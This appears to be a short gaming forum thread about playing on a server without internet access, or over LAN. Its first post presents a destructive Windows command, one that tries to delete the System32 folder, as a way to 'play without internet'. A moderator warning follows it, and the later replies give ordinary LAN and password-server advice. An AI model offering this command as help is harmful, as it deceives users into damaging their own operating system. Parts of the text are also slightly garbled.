This is how you can play without internet. Open command prompt and type this:
echo off del C:\Windows\System32
Admin/mod comment
§5.1 - Show good behavior and simply don't be a stupid asshole sv_lan 0
Onlineconnected to the same internet as you will play on the server.
If your friend and you got the same internet then go to LAN tab and you will see a server there if it's on.
If you and your friend DON'T play on the same internet then simply make a server with password and tell him to join via Server List or "Connect to IP".
1. I make a network LAN
2. I open my server in dedicated
3. He join my server, work.
